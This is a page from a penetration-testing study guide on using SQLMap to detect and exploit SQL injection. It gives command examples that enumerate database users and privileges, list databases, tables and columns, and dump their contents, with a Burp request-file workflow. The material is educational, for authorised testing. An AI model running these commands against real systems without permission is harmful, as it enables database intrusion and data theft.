HomeGitHubPortfolioTwitter/XMediumCont@ct

2.4.6 SQLMap

SQLMap

SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing.

Basic Syntax

  • Detecting SQL Injection: To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example:

    $ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U

    This command tells SQLMap to test the id parameter of a GET request for view.php using a Union-based SQL injection technique.

  • Handling POST Parameters: If the injection involves a POST parameter, the syntax would be:

    $ sqlmap -u <URL> --data=<POST string> -p parameter [options]

    You can write the POST string manually or copy it from a request intercepted with Burp Proxy.

  • Using Request Files: Save a request intercepted with Burp Proxy to a file and specify it on the command line:

    $ sqlmap -r <request file> -p parameter [options]

Extracting Information

  • Database Banner: The --banner switch helps in grabbing the database banner to test injection and include proof of exploitability in reports:

    $ sqlmap -u <target> --banner <other options>

  • Information Gathering:

    • List users of the database:

      $ sqlmap -u <target> --users <other options>

    • Check if the web application database user is a database administrator:

      $ sqlmap -u <target> --is-dba <other options>

  • Database and Schema Extraction:

    • List all available databases:

      $ sqlmap -u <target> --dbs <other options>

    • Choose a database and list its tables:

      $ sqlmap -u <target> -D <database> --tables <other options>

    • Choose tables and list their columns:

      $ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options>

    • Dump specific columns:

      $ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>

SQLMap Advanced Usage

  • Forcing the DBMS: Specify the DBMS to help shorten the detection phase:

    $ sqlmap --dbms=<DBMS> ...

    Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more.

  • Fine-Tuning Payloads: Use --string and --not-string to handle changes in application output. For example:

    $ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" <other switches>

    Utilize --prefix and --suffix for structured POST parameters.

  • Aggressiveness and Load:

    • Use --level to test headers and increase the number of columns tested for in-band exploitation.

    • Use --risk to adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections.

  • Connection Management:

    • Use --keep-alive for persistent connections:

      $ sqlmap -u <target> --keep-alive <other commands>

    • Use --threads to exploit injections with parallel threads:

      $ sqlmap -u <target> --technique=8 --threads 7 <other commands>

  • SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration.

  • Understanding the tools and their options is crucial for successful and responsible penetration testing.

  • SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process.

  • Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices.

BurpSuite & SQLMap

A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml).

We will then open that file with SQLMap and check for vulnerabilities or not.

sqlmap -r sql_request_captured.xml
Previous2.4.5 Exploiting Blind SQL InjectionNext2.4.7 Mitigation Strategies